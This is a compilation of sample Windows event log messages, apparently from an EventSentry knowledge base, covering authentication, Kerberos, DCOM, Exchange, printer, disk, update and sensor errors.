An anonymous session connected from 192.168.6.60 has attempted to open an LSA policy handle on this machine. The attempt was rejected with STATUS_ACCESS_DENIED to prevent leaking security sensitive information to the anonymous caller.
The application that made this attempt needs to be fixed. Please contact the application vendor. As a temporary workaround, this security measure can be disabled by setting the \HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\TurnOffAnonymousBlock DWORD value to 1.
This message will be logged at most once a day.
Message:
EventSentry determined that "Process Tracking" is enabled and data will be now be collected.
Message:
EventSentry has successfully changed the Audit Policy and has enabled "Process Tracking". Process data will be now be collected.
Message:
EventSentry determined that "Process Tracking" is currently enabled and was unable to deactivate it. A call to change the current audit policy failed with error %1. Please see the EventSentry documentation for troubleshooting advice on this problem.
Message:
Process Tracking has been enabled but the "Log Size" properties of the Security event log are not configured properly. In order for Process Tracking to work reliably it is recommended that you reconfigure the security event log (with "Event Viewer") to "Overwrite events as needed".
Message:
EventSentry has successfully changed the Audit Policy and has disabled "Process Tracking". Process data will no longer be collected.
Message:
The configured temperature limit of %1 degrees (%3) has been exceeded, the current temperature is %2 degrees (%3).
Message:
The configured humidity limit of 60% has been exceeded, the current humidity level is 90%.
Message:
EventSentry was unable to find a temperature and/or humidity sensor on serial port %1. Please make sure the device is connected properly.
Message:
The database write interval for environment monitoring is set too small. The interval was automatically adjusted to %1 seconds.
Message:
Unable to open serial port %1 due to error "%2". Environment monitoring will not continue.
Message:
The temperature has fallen below the configured limit of %1 degrees (%3). The current temperature is %2 degrees (%3).
Message:
The humidity level has fallen below the configured limit of %1%. The current humidity level is %2%%.
Message:
The current temperature has fallen outside the configured range (%1%4 to %2%4). The current temperature is %3 degrees (%4).
Message:
The current humidity level has fallen outside the configured range (%1%% to %2%%). The current humidity level is %3%%.
Message:
The temperature (78.96 degrees F) is back in the configured range (60F to 78F)
Message:
The current humidity level is back in the configured range (10% to 70%). The current humidity level is 15%.
Message:
Change Password Attempt:
Target Account Name: ingmar
Target Domain: NETIKUS
Target Account ID: NETIKUS\ingmar
Caller User Name: ingmar
Caller Domain: NETIKUS
Caller Logon ID: (0x0,0xA467822)
Privileges: -
Message:
The currently selected KDC certificate was once valid, but now is invalid and no suitable replacement was found. Smartcard logon may not function correctly if this problem is not remedied. Have the system administrator check on the state of the domain's public key infrastructure. The chain status is in the error data.
Message:
The kerberos client received a KRB_AP_ERR_TKT_NYV error from the server TEST-W2K$. This indicates that the ticket used against that server is not yet valid (in relationship to that server time). Contact your system administrator to make sure the client and server times are in sync, and that the KDC in realm TESTGROUND.LOCAL is in sync with the KDC in the client realm.
Source:
Windows Update Agent
Message:
Installation Failure: Windows failed to install the following update with error 0x80070643: Security Update for Flash Player (KB913433).
Message:
The DHCP/BINL service on this Small Business Server has encountered another server on this network with IP Address, 10.10.10.1, belonging to the domain: .
Message:
The DHCP/BINL service on this computer is shutting down. See the previous event log messages for reasons.
Message:
Automatic certificate enrollment for local system failed to enroll for one Directory Email Replication certificate (0x80070005). Access is denied.
Message:
A user hit their quota limit on volume C:.
Message:
Backup Exec Alert: Job Failed(Server: 'CWBAPP01') (Job: 'SQL SERVER DAILY - FULL') SQL SERVER DAILY - FULL -- The job failed with the following error: A failure occurred querying the Writer status. For more information, click the following link: http://eventlookup.veritas.com/eventlookup/EventLookup.jhtml
Message:
The timeout waiting for the performance data collection function "ABC" in the "C:\WINNT\system32\perf.dll" Library to finish has expired. There may be a problem with this extensible counter or the service it is collecting data from or the system may have been very busy when this call was attempted.
Source:
Windows Update Agent
Message:
Installation Failure: Windows failed to install the following update with error 0x80070003: Security Update for Windows XP (KB873339).
Category:
Logging/Recovery
Message:
Information Store (324) First Storage Group: The backup has been stopped because it was halted by the client or the connection with the client failed.
Message:
DCOM got error "The service cannot be started, either because it is disabled or because it has no enabled devices associated with it. " attempting to start the service IISADMIN with arguments "" in order to run the server:
{A9E69610-B80D-11D0-B9B9-00A0C922E750}
Message:
Type: Success Audit
Description: Windows NT is shutting down.
All logon sessions will be terminated by this shutdown.
Message:
Type: Success Audit
Windows is starting up
Message:
DCOM was unable to communicate with the computer 192.168.x.xx using any of the configured protocols.
Message:
Windows cannot determine the user or computer name. (The specified user does not exist.). Group Policy processing aborted.
Message:
Unable to read local eventlog (reason: The data area passed to a system call is too small).
Message:
Scheduled Task created:
File Name: C:\WINDOWS\Tasks\Calculator.job
Command: C:\WINDOWS\system32\calc.exe
Triggers: At 11:48 AM every day, starting 11/14/2006.
Time: 11/14/2006 11:48:00 AM
Flags: 0x18000C0
Target User: EVENTSENTRY\User1
By:
User: User1
Domain: EVENTSENTRY
Logon ID: (0x0,0x127F30A0)
Message:
The shadow copies of volume C: were deleted because the shadow copy storage could not grow in time. Consider reducing the IO load on the system or choose a shadow copy storage volume that is not being shadow copied.
Message:
Logon Failure:
Reason: An error occurred during logon
User Name: TheUser
Domain: TheDomain
Logon Type: 11
Logon Process: User32
Authentication Package: Negotiate
Workstation Name: WORKSTATION01
Status code: 0xC000005E
Substatus code: 0x0
Message:
Authentication Ticket Request:
User Name: computer$
Supplied Realm Name: DOMAIN.LOCAL
User ID: -
Service Name: krbtgt/DOMAIN.LOCAL
Service ID: -
Ticket Options: 0x40810010
Result Code: 0x6
Ticket Encryption Type: -
Pre-Authentication Type: -
Client Address: 192.168.1.122
Certificate Issuer Name:
Certificate Serial Number:
Certificate Thumbprint:
Message:
The master browser has received a server announcement from the computer NT29 that believes that it is the master browser for the domain on transport NetBT_Tcpip_{492C50E8-6A5F-48B9-BA. The master browser is stopping or an election is being forced.
Message:
EFS does not support encryption over network sessions established using the NTLM protocol.
Message:
DS lookup for user USERNAME, connecting from 192.168.1.1, failed with error 0x80040920.
Message:
The mailbox for /o=First Organization/ou=first administrative group/cn=Recipients/cn=USERNAME has exceeded the maximum mailbox size. This mailbox cannot send or receive messages. Incoming messages to this mailbox are returned to sender. The mailbox owner should be notified about the condition of the mailbox as soon as possible.
Message:
Driver Lexmark W812 required for printer !!Shmata!Lexmark W812 is unknown. Contact the administrator to install the driver before you log in again.
Source:
Server ActiveSync
Message:
Unexpected Exchange mailbox Server error: Server: [EXCHANGE.yourdomain.local] User: [youruser@yourdomain.com] HTTP status code: [409]. Verify that the Exchange mailbox Server is working correctly.
Message:
The Open Procedure for service "ASP.NET_2.0.50727" in DLL "C:\WINNT\Microsoft.NET\Framework\v2.0.50727\aspnet_perf.dll" failed. Performance data for this service will not be available. Status code returned is data DWORD 0.
Source:
Application Error
Message:
Faulting application iexplore.exe, version 7.0.5730.11, faulting module flash9b.ocx, version 9.0.28.0, fault address 0x00072826.
Message:
Connections: blacklisted: xx.xx.xx.xx
Message:
WMI ADAP was unable to retrieve data from the PerfLib subkey: %1, error code: %2
Message:
Driver has encountered an internal error.
Message:
Product: Microsoft Visual Studio 2005 Premier Partner Edition - ENU -- Error 1718.File C:\WINDOWS\Installer\236249.msp did not pass the digital signature check. For more information about a possible resolution for this problem, see http://go.microsoft.com/fwlink/?LinkId=73863.
Message:
The installation of C:\WINDOWS\Installer\236249.msp is not permitted due to an error in software restriction policy processing. The object cannot be trusted.
Source:
Windows Update Agent
Message:
Installation Failure: Windows failed to install the following update with error 0x80070643: Visual Studio 2005 Service Pack 1.
Message:
Volume Shadow Copy Service error: Unexpected error calling routine CoCreateInstance. hr = 0x80040154.
Message:
The device, \Device\Harddisk0\D, has a bad block.
Message:
The certificate received from the remote server was issued by an untrusted certificate authority. Because of this, none of the data contained in the certificate can be validated. The SSL connection request has failed. The attached data contains the server certificate.
Message:
A zone transfer request for the secondary zone somedomain.local was refused by the master DNS server at 1.2.3.4. Check the zone at the master server 1.2.3.4 to verify that zone transfer is enabled to this server. To do so, use the DNS console, and select master server 1.2.3.4 as the applicable server, then in secondary zone somedomain.local Properties, view the settings on the Zone Transfers tab. Based on the settings you choose, make any configuration adjustments there (or possibly in the Name Servers tab) so that a zone transfer can be made to this server.
Source:
MSExchangeIS Mailbox Store
Category:
MTA Connections
Message:
Verify that the Microsoft Exchange MTA service has started. Consecutive ma-open calls are failing with error 3051.
Message:
The device Root\LEGACY_ERASERUTILDRV10710\0000 disappeared from the system without first being prepared for removal.
Source:
Office Server Search
Message:
The start address <http://xxx> cannot be crawled.
Context: Application 'ABC', Catalog 'Portal_Content'
Details:
Element not found.
(0x8002802b)
Message:
The COM+ Event System failed to create an instance of the subscriber 58FC39EB-9DBD-4EA7-B7B4-9404CC6ACFAB. StandardCreateInstance returned HRESULT 8000401A.
Message:
The redirector failed to determine the connection type.
Message:
Type: Failure Audit
Source: Security
Event Category: Account Logon
Event ID: 677
User: NT AUTHORITY\SYSTEM
Description: Service Ticket Request Failed:
User Name: UserName
User Domain: DomainName
Service Name: ServiceName
Ticket Options: 0x40830000
Failure Code: 0xE
Client Address: IPAddress
Message:
Event message 1
Event Type: Error
Event Source: DCOM
Event Category: None
Event ID: 10021
Date: Date
Time: Time
User: N/A
Computer: SMS SERVER
Description:
The launch and activation security descriptor for the COM Server application with CLSID {61738644-F196-11D0-9953-00C04FD919C1}. is invalid. It contains Access Control Entries with permissions that are invalid. The requested action was therefore not performed. This security permission can be corrected using the Component Services administrative tool.
Event message 2
Event Type: Error
Event Source: DCOM
Event Category: None
Event ID: 10016
Date: Date
Time: Time
User: NT AUTHORITY\SYSTEM
Computer: SMSSERVER
Description:
The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID {05D1D5D8-18D1-4B83-85ED-A0F99D53C885} to the user NT AUTHORITY\SYSTEM SID (S-1-5-18). This security permission can be modified using the Component Services administrative tool.
Category:
Initialization/Termination
Message:
Event Type: Warning
Event Source: Microsoft Fax
Event Category: Initialization/Termination
Event ID: 32026
Date: 16/11/2005
Time: 05:40:54
User: N/A
Computer: HOUSINGXP
Description:
Fax Service failed to initialize any assigned fax devices (virtual or
TAPI). No faxes can be sent or received until a fax device is
installed.
Source:
SQLAgent$SHAREPOINT
Message:
SQLAgent is not allowed to run.
Message:
SConnection: AuthFailureException: Authentication failure
Message:
This directory partition has not been backed up since at least the following number of days.
Directory partition:
DC=testdcgrnd,DC=local
'Backup latency interval' (days):
90
It is recommended that you take a backup as often as possible to recover from accidental loss of data. However if you haven't taken a backup since at least the 'backup latency interval' number of days, this message will be logged every day until a backup is taken. You can take a backup of any replica that holds this partition.
By default the 'Backup latency interval' is set to half the 'Tombstone Lifetime Interval'. If you want to change the default 'Backup latency interval', you could do so by adding the following registry key.
'Backup latency interval' (days) registry key:
System\CurrentControlSet\Services\NTDS\Parameters\Backup Latency Threshold (days)
Source:
Server Administrator
Category:
Storage Service
Message:
Virtual disk degraded: Virtual Disk 1 (Virtual Disk 1) Controller 0 (PERC 5/i Integrated)
Source:
Server Administrator
Category:
Storage Service
Message:
Physical disk removed: Physical Disk 0:0:0 Controller 0, Connector 0
Source:
Software Installation
Message:
Software Installation encountered an unexpected error while reading from the MSI file \\server\Software\Firefox\Firefox-2.0.0.4-en-US.msi. The error was not serious enough to justify halting the operation. The following error was encountered: The operation completed successfully.
Source:
MSExchangeTransport
Category:
Connection Manager
Message:
Message delivery to the remote domain 'somedomain.com' failed for the following reason: Unable to bind to the destination server in DNS.
Message:
The driver detected that the device \Device\Harddisk0\DR0 has its write cache enabled. Data corruption may occur.
Message:
The time service has not been able to synchronize the system time for 49152 seconds because none of the time providers has been able to provide a usable time stamp. The system clock is unsynchronized.
For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.
Message:
Windows cannot obtain the domain controller name for your computer network. (A socket operation was attempted to an unreachable host. ). Group Policy processing aborted.
Category:
Printer Management
Message:
An error occured while retrieving client printer properties. Default printer properties will be used instead. Client name: () Printer: (Client/hostname#/printername) Printer driver: (Citrix Universal Printer)
Category:
Detailed Tracking
Message:
The Windows Firewall has detected an application listening for incoming traffic.
Name: -
Path: C:\WINDOWS\system32\eventsentry_svc.exe
Process identifier: 4840
User account: es_svc
User domain: DMN
Service: Yes
RPC server: No
IP version: IPv4
IP protocol: UDP
Port number: 2594
Allowed: No
User notified: No
Source:
MSExchangeTransport
Message:
Failed in reading Connector's DS Info Process Id: 1100 Process location: C:\WINNT\System32\inetsrv\inetinfo.exe ConnectorDN: CN=External Mail,CN=Connections,CN=First Routing Group,CN=Routing Groups,CN=First Administrative Group,CN=Administrative Groups,CN=APM,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=ad,DC=apm,DC=net,DC=au Hr:80040920 Attribute:[]
Message:
An error occurred while attempting to log in to the following server: "SERVER04\DMD_SERVER".
SQL error number: "4818".
SQL error message: "Login failed for user 'WSM1\Administrator'.
".
Message:
Client printer auto-creation failed. The driver could not be installed. Possible reasons for the failure: The driver is not in the list of drivers on the server. The driver cannot be located. The driver has not been mapped. Client name: (CALPC01445) Printer: (HP LaserJet 1020 (from CALPC01445) in session 33) Printer driver: (HP LaserJet 1020)
Message:
The Open Procedure for service 'ScanMail_Monitor' in DLL 'C:\WINNT\system32\SmxPerf.dll' failed. Performance data for this service will not be available. Status code returned is data DWORD 0.
Message:
Event from Fault: NT Log Monitor[0] : Event from NT System Log[TermServDevices] , Event: ID= 1111, Description: Driver SHARP AR-M277 PCL5e required for printer !!YOWOTTSRV007!OttSharpARM27701 is unknown. Contact the administrator to install the driver before you log in again.
Message:
The Open Procedure for service 'AppleTalk' in DLL 'C:\WINNT\system32\atkctrs.dll' failed. Performance data for this service will not be available. Status code returned is data DWORD 0.
Message:
Client printer auto-creation failed. The driver could not be installed. Possible reasons for the failure: The driver is not in the list of drivers on the server. The driver cannot be located. The driver has not been mapped. Client name: (YYZCHOSRVxxx) Printer: (CutePDF Writer (from YYZCHOSRVxxx) in session 112) Printer driver: (CutePDF Writer)
Message:
The browser service has failed to retrieve the backup list too many times on transport \Device\NetBT_Tcpip_6ADE6448-65A6-49CA-B8F8-686CE64294DC. The backup browser is stopping.
Source:
Domain Time Server
Message:
Another process has changed the clock rate from 156251/156250 to 156252/156250)
Message:
Unable to open shim database version registry key - v2.0.50727.00000
Message:
Windows has detected that Offline Caching is enabled on the Roaming Profile share - to avoid potential profile corruption, Offline Caching must be disabled on shares where roaming user profiles are stored.
Message:
Security policies were propagated with warning. 0x4b8 : An extended error has occurred.
For best results in resolving this event, log on with a non-administrative account and search http://support.microsoft.com for "Troubleshooting Event 1202's".
Source:
Removable Storage Service
Message:
RSM could not load media in drive Drive 0 of library Iomega RRD2.
Message:
Printer Driver HP Color LaserJet 2605dn_2605dtn PCL 6 for Windows NT x86 Version-3 was added or updated. Files:- UNIDRV.DLL, UNIDRVUI.DLL, HPC260d6.GPD, UNIDRV.HLP, hpzsc053.dtd, hpzst053.dll, hpc260d6.xml, hpc260dc.ini, hpzpp053.dll, hpzui053.dll, hpz6r053.dll, hpcdmc32.dll, hpbcfgre.dll, hpz6m053.gpd, hpzsm053.gpd, HPC260x6.GPD, hpzev053.dll, pclxl.dll, pjl.gpd, p6disp.gpd, pclxl.gpd, HPZHL053.CAB, STDNAMES.GPD, hpzls053.dll, hpzss053.dll, UNIRES.DLL.
Message:
Unable to move file E:\System Volume Information\20d5a57d-4de1-11dc-a8af-00101815f0e6{3808876b-c176-4e48-b7ae-04046e6cc752} after many attempts. Skipping file.
Message:
The process winlogon.exe has initiated the restart of PANTHER for the following reason: No title for this reason could be found
Minor Reason: 0xff
Shutdown Type: shutdown
Comment: The EventSentry agent is performing a shutdown/reboot of this computer.
Source:
Service Control Manager
Message:
The ABC service was unable to log on as DOMAIN\service.account with the currently configured password due to the following error:
Logon failure: unknown user name or bad password.
To ensure that the service is configured properly, use the Services snap-in in Microsoft Management Console (MMC).
Message:
User Account password set:
Target Account Name: QA
Target Domain: WESTELL
Target Account ID: WESTELL\QA
Caller User Name: JHINT
Caller Domain: WESTELL
Caller Logon ID: (0x0,0x8F1A7AB5)
Message:
The DNS server encountered an invalid domain name in a packet from 128.252.19.21. The packet will be rejected. The event data contains the DNS packet.
Source:
Server Administrator
Message:
Controller log file entry: VD 00/0 is now OPTIMAL: Virtual Disk 0 (Virtual Disk 0) Controller 0 (PERC 5/i Integrated)
Source:
Server Administrator
Message:
Redundancy lost: Virtual Disk 0 (Virtual Disk 0) Controller 0 (PERC 5/i Integrated)
Source:
Server Administrator
Message:
Device failed: Physical Disk 1:0:9 Controller 0, Connector 1
Source:
Server Administrator
Message:
Virtual disk degraded: Virtual Disk 0 (Virtual Disk 0) Controller 0 (PERC 5/i Integrated)
Message:
Document 19, Name Of The Document Would Be Here owned by domainuser was printed on HP LaserJet 2420d via port IP_192.162.2.29. Size in bytes: 0; pages printed: 1
Message:
The document Name Of The Document Would Be Here owned by domainuser failed to print on printer HP LaserJet 2420d. Data type: NT EMF 1.008. Size of the spool file in bytes: 191336. Number of bytes printed: 0. Total number of pages in the document: 1. Number of pages printed: 0. Client machine: \\192.168.3.251. Win32 error code returned by the print processor: 0. The operation completed successfully.
Message:
The time service has detected that the system time needs to be changed by -2591998 seconds. The time service will not change the system time by more than -54000 seconds. Verify that your time and time zone are correct, and that the time source xxxx.xxxx.xxx (ntp.d|xx.xx.xx.xx:123->xx.xx.xx.xx:123) is working properly.
Source:
MSExchangeIS Mailbox Store
Message:
Exchange store 'First Storage Group\Mailbox Store (SERVER)': The logical size of this database (the logical size equals the physical size of the .edb file and the .stm file minus the logical free space in each) is 16 GB. This database size is approaching the size limit of 18 GB.
If the logical database size exceeds the maximum size limit, it will be dismounted on a regular basis.
For more information, click http://www.microsoft.com/contentredirect.asp.
Message:
Adapter 0 Channel 0 Target 2: Media Error Count=1, Other Error Count=0
Message:
OALGen will skip user entry '@ I-Tek GM-TIS Prod TivTalk' in address list '\Global Address List' because the SMTP address '' is invalid. - Default Offline Address List For more information, click http://www.microsoft.com/contentredirect.asp.
Message:
Login failed for user 'sa'. The user is not associated with a trusted SQL Server connection. [CLIENT: 202.98.221.121]
Message:
Windows cannot read the history of GPOs from the registry. Continuing Group Policy Processing.
Message:
The reason supplied by user SORTRITE\Craig McWilliams for the last unexpected shutdown of this computer is: Other (Unplanned)
Reason Code: 0xa000000
Bug ID:
Bugcheck String:
Comment: Do not know -- Craig.
Message:
Auto Client Reconnect attempted but failed due to incorrect cookie data. NOTE: If this error occurs frequently it may indicate an attempt to gain unauthorized access to the system.
Message:
Windows cannot determine the user or computer name. (Access is denied. ). Group Policy processing aborted.
Message:
A duplicate name has been detected on the TCP network. The IP address of the machine that sent the message is in the data. Use nbtstat -n in a command window to see which name is in the Conflict state.
Message:
DCOM got error '58' attempting to start the service StiSvc with arguments '' in order to run the server:A1F4E726-8CF1-11D1-BF92-0060081ED811
Message:
Pre-authentication failed:
User Name: WIN2008$
User ID: TESTGROUND\WIN2008$
Service Name: krbtgt/TESTGROUND.LOCAL
Pre-Authentication Type: 0x0
Failure Code: 0x19
Client Address: 192.138.23.31
Message:
This directory partition has not been backed up since at least the following number of days. Directory partition: DC=BarrettHospital,DC=local 'Backup latency interval' (days): 30 It is recommended that you take a backup as often as possible to recover from accidental loss of data. However if you haven't taken a backup since at least the 'backup latency interval' number of days, this message will be logged every day until a backup is taken. You can take a backup of any replica that holds this partition. By default the 'Backup latency interval' is set to half the 'Tombstone Lifetime Interval'. If you want to change the default 'Backup latency interval', you could do so by adding the following registry key. 'Backup latency interval' (days) registry key: System\CurrentControlSet\Services\NTDS\Parameters\Backup Latency Threshold (days)
Message:
A Kerberos Error Message was received:
on logon session
Client Time:
Server Time: 13:37:37.0000 12/14/2007 Z
Error Code: 0x34 KRB_ERR_RESPONSE_TOO_BIG
Extended Error:
Client Realm:
Client Name:
Server Realm: KDOMAIN.COM
Server Name: host/kap.kdomain.com
Target Name: host/kap.kdomain.com@KDOMAIN.COM
Error Text:
File: 9
Line: ae0
Error Data is in record data.
Message:
A Kerberos Error Message was received:
on logon session
Client Time:
Server Time: 13:34:51.0000 12/14/2007 Z
Error Code: 0xd KDC_ERR_BADOPTION
Extended Error: 0xc00000bb KLIN(0)
Client Realm:
Client Name:
Server Realm: KDOMAIN.COM
Server Name: host/kap.kdomain.com
Target Name: host/kap.kdomain.com@KDOMAIN.COM
Error Text:
File: 9
Line: ae0
Error Data is in record data.
Message:
DCOM got error '58' attempting to start the service gusvc with arguments '' in order to run the server:89DAE4CD-9F17-4980-902A-99BA84A8F5C8
Message:
Product: QuickBooks -- Error 1328.Error applying patch to file C:\Config.Msi\PT43.tmp. It has probably been updated by other means, and can no longer be modified by this patch. For more information contact your patch vendor. System Error: -1072807676
Message:
The Network Address Translator (NAT) was unable to request an operation of the kernel-mode translation module. This may indicate misconfiguration, insufficient resources, or an internal error. The data is the error code.
Message:
Error communicating with the Spooler system service. Open the Services snap-in and confirm that the Print Spooler service is running.
Message:
A desktop heap allocation failed.
Message:
The user DOMAIN\User connected to port VPN4-5 has been disconnected because no network protocols were successfully negotiated.
Source:
Server Administrator
Message:
Predictive Failure reported: Array Disk 0:4 Controller 0, Connector 0
Message:
Your computer was not able to renew its address from the network (from the DHCP Server) for the Network Card with network address 00508DB42684. The following error occurred:
The semaphore timeout period has expired.. Your computer will continue to try and obtain an address on its own from the network address (DHCP) server.
Source:
Unlocker application
Message:
\Device\UnlockerDriver5/
0000: 00 00 00 00 01 00 68 00 00 00 00 00 36 00 04 80
0001: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0002: 00 00 00 00 00 00 00 00
Message:
The following 2 service(s) are configured to AUTOSTART but are currently not running:
Performance Logs and Alerts
Virtual Machine Additions Shared Folder Service
Message:
Automatic certificate enrollment for local system failed to enroll for one Domain Controller certificate (0x80070005). Access is denied.
Message:
Microsoft (R) Windows (R) 5.02. 3790 Service Pack 2 Multiprocessor Free.
Message:
Login failed for user 'sa'. [CLIENT: 192.168.6.52]
Message:
The system detected an address conflict for IP address 172.20.5.14 with the system having network hardware address 00:07:E9:40:7C:40. Network operations on this system may be disrupted as a result.
Source:
Windows Update Agent
Message:
Installationsfehler: Die Installation des folgenden Updates ist mit Fehler 0x80070643 fehlgeschlagen: Sicherheitsupdate für Microsoft .NET Framework, Version 1.1 Service Pack 1 (KB928366)
Source:
Windows Update Agent
Message:
Installationsfehler: Die Installation des folgenden Updates ist mit Fehler 0x80070643 fehlgeschlagen: Sicherheitsupdate für Microsoft .NET Framework, Version 1.1 Service Pack 1 (KB928366)
Installation Error: the installation of the following update has failed with error 0x80070643: Security Update for Microsoft .NET Framework Version 1.1 Service Pack 1 (KB928366)
Message:
Windows cannot load extensible counter DLL MSSQL$MS_ADMT, the first DWORD in data section is the Windows error code.
Source:
Microsoft-Windows-ApplicationExperienceInfrastructure
Message:
The application (OfficeScan Client, from vendor Trend Micro, INC.) has the following problem: OfficeScan Client is incompatible with this version of Windows. For more information, contact Trend Micro, INC..
Message:
SQL Server has encountered 136 occurrence(s) of cachestore flush for the 'Object Plans' cachestore (part of plan cache) due to some database maintenance or reconfigure operations.
Message:
SQLVDI: Loc=CVDS::Cleanup. Desc=Release(ClientAliveMutex). ErrorCode=(288)Attempt to release mutex not owned by caller.
. Process=2084. Thread=5976. Client. Instance=. VD=.
Message:
The following service was removed: CryptSvc4951 (CryptSvc4951). Last service state was Stopped.
Source:
.NET Runtime 2.0 Error Reporting
Message:
EventType clr20r3, P1 w3wp.exe, P2 6.0.3790.3959, P3 45d6968e, P4 mscorlib, P5 2.0.0.0, P6 471ebc5b, P7 416e, P8 a3, P9 system.argumentoutofrange, P10 NIL.
Source:
ASP.NET 2.0.50727.0
Message:
An unhandled exception occurred and the process was terminated.
Application ID: /LM/W3SVC/1694288962/ROOT/ReportingWebService
Process ID: 5568
Exception: System.ArgumentOutOfRangeException
Message: Index was out of range. Must be non-negative and less than the size of the collection.
Parameter name: index
StackTrace:
Server stack trace:
at System.Collections.ArrayList.get_Item(Int32 index)
at System.Collections.Specialized.StringCollection.get_Item(Int32 index)
at Microsoft.UpdateServices.Internal.Reporting.ExtendedData.ToString()
at Microsoft.UpdateServices.Internal.Reporting.ReportingEvent.ToString()
at Microsoft.UpdateServices.Internal.Reporting.DebugEventHandler.HandleEvent(IReportingInformation[] itemList)
at System.Runtime.Remoting.Messaging.StackBuilderSink._PrivateProcessMessage(IntPtr md, Object[] args, Object server, Int32 methodPtr, Boolean fExecuteInContext, Object[]
Category:
Heartbeat Monitoring
Message:
The AGENT status of host <HOSTNAME> (<GROUP>) remains at ERROR due to error "Access is denied.
".
Message:
Driver HP Color LaserJet 4600 PCL 6 required for printer !!swpma1fs1!MA1-POINT-COLOR-HP4600 is unknown. Contact the administrator to install the driver before you log in again.
Message:
Object Access Attempt:
Object Server: Security
Handle ID: 9780
Object Type: File
Process ID: 904
Image File Name: C:\WINDOWS\system32\svchost.exe
Accesses: WriteData (or AddFile)
AppendData (or AddSubdirectory or CreatePipeInstance)
Access Mask: 0x6
Source:
Application Error
Message:
Faulting application eventsentry_svc.exe, version 2.60.0.130, faulting module eventsentry_svc.exe, version 2.60.0.130, fault address 0x0002eafa.
Category:
Software Monitoring
Message:
Application 86C01576-F161-3624-9462-D87DE3243DC4 (using file ) was removed from the registry key HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components and will no longer be run when a user logs into the system.
Source:
.NET Runtime Optimization Service
Message:
.NET Runtime Optimization Service (clr_optimization_v2.0.50727_32) - Failed to compile: Microsoft.ReportingServices.QueryDesigners, Version=9.0.242.0, Culture=neutral, PublicKeyToken=89845dcd8080cc91 . Error code = 0x80070002
Message:
The server was unable to allocate from the system paged pool because the pool was empty.
Category:
Logging/Recovery
Message:
Information Store (284) First Storage Group: Attempted to attach database 'D:\Program Files\Exchsrvr\MDBDATA\priv1.EDB' but it is a database restored from a backup set on which hard recovery was not started or did not complete successfully.
Message:
Error 0xfffffde0 starting database "First Storage Group\Mailbox Store (SERVER)" on the Microsoft Exchange Information Store.
Message:
The MAPI call 'OpenMsgStore' failed with the following error:
The attempt to log on to the Microsoft Exchange Server computer has failed.
The MAPI provider failed.
Microsoft Exchange Server Information Store
ID no: 8004011d-0512-00000000
Source:
Microsoft-Windows-Perflib
Message:
The data buffer created for the "VMware" service in the "C:\Program Files\VMware\VMware Server\vmPerfmon.dll" library is not aligned on an 8-byte boundary. This may cause problems for applications that are trying to read the performance data buffer. Contact the manufacturer of this library or service to have this problem corrected or to get a newer version of this library.
Message:
The configuration information of the performance library "C:\WINDOWS\system32\aspperf.dll | infoctrs.dll | perfts.dll" for the "ASP | InetInfo | TermService" service does not match the trusted performance library information stored in the registry. The functions in this library will not be treated as trusted.
Category:
Detailed Tracking
Message:
Unprotection of auditable protected data.
Data Description:
Key Identifier: 575dfb1a-2f3a-4cdd-a08c-5e2bf47579ed
Protected Data Flags: 0x0
Protection Algorithms: 3DES-168 , SHA1-160
Failure Reason: 0x8009000B
Source:
MSExchangeIS Public Store
Message:
user@domain.com failed an operation on folder /O=ORG/OU=FIRST ADMINISTRATIVE GROUP/CN=RECIPIENTS/CN=OAB VERSION 3AD24215E446FED006D7E903A387A01BE4002721 on database "First Storage Group\Public Folder Store (SERVER)" because the user did not have the following access rights:
'Delete' 'Read Property' 'Write Property' 'Create Message' 'View Item' 'Create Subfolder' 'Write Security Descriptor' 'Write Owner' 'Read Security Descriptor' 'Contact'
The entry ID of the folder is in the data section of this event.
Source:
Microsoft-Windows-Kerberos-Key-Distribution-Center
Message:
The Key Distribution Center (KDC) cannot find a suitable certificate to use for smart card logons, or the KDC certificate could not be verified. Smart card logon may not function correctly if this problem is not resolved. To correct this problem, either verify the existing KDC certificate using certutil.exe or enroll for a new KDC certificate.
Message:
Unknown error on L1 -> L0
Message:
The DNS server has encountered numerous run-time events. To determine the initial cause of these run-time events, examine the DNS server event log entries that precede this event. To prevent the DNS server from filling the event log too quickly, subsequent events with Event IDs higher than 3000 will be suppressed until events are no longer being generated at a high rate.
Category:
Software Monitoring
Message:
Application 3087B10A-0736-6446-6DF0-F69FB0A3D2DA (using file ) was removed from the registry key HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components and will no longer be run when a user logs into the system.
Source:
Windows Update Agent
Message:
Installation Failure: Windows failed to install the following update with error 0x80070643: Update for .NET Framework 3.0: x86 (KB932471).
Message:
An error was detected on device \Device\Harddisk3\D during a paging operation.
Message:
The Windows NT 4.0 or earlier replication checkpoint with the PDC emulator master was unsuccessful.
A full synchronization of the security accounts manager (SAM) database to domain controllers running Windows NT 4.0 and earlier might take place if the PDC emulator master role is transferred to the local domain controller before the next successful checkpoint.
The checkpoint process will be tried again in four hours.
Additional Data
Error value:
1722 The RPC server is unavailable.
Source:
Microsoft-Windows-GroupPolicy
Message:
The processing of Group Policy failed. Windows attempted to read the file \\mydomain.local\SysVol\mydomain.local\Policies\D3610029-D721-41DA-ACE6-FD0CAF521432\gpt.ini from a domain controller and was not successful. Group Policy settings may not be applied until this event is resolved. This issue may be transient and could be caused by one or more of the following:
a) Name Resolution/Network Connectivity to the current domain controller.
b) File Replication Service Latency (a file created on another domain controller has not replicated to the current domain controller).
c) The Distributed File System (DFS) client has been disabled.
Source:
Office SharePoint Server
Category:
Office Server Shared Services
Message:
490684
Application
Warning
Office SharePoint Server
Office Server Shared Services
6801
REPORT
5/28/2008 12:00:01 AM
The OSS SQM Data Collection Job encountered a problem.
Reason: The site with the id 6543302f-5713-47ba-ac93-ba38dd1d9cd6 could not be found.
Technical Support Details:
System.IO.FileNotFoundException: The site with the id 6543302f-5713-47ba-ac93-ba38dd1d9cd6 could not be found.
at Microsoft.SharePoint.SPSite..ctor(Guid id, SPFarm farm, SPUrlZone zone, SPUserToken userToken)
at Microsoft.SharePoint.SPSite..ctor(Guid id, SPFarm farm, SPUrlZone zone)
at Microsoft.SharePoint.SPSite.LookupUriInRemoteFarm(SPFarm farm, Guid id, SPUrlZone zone)
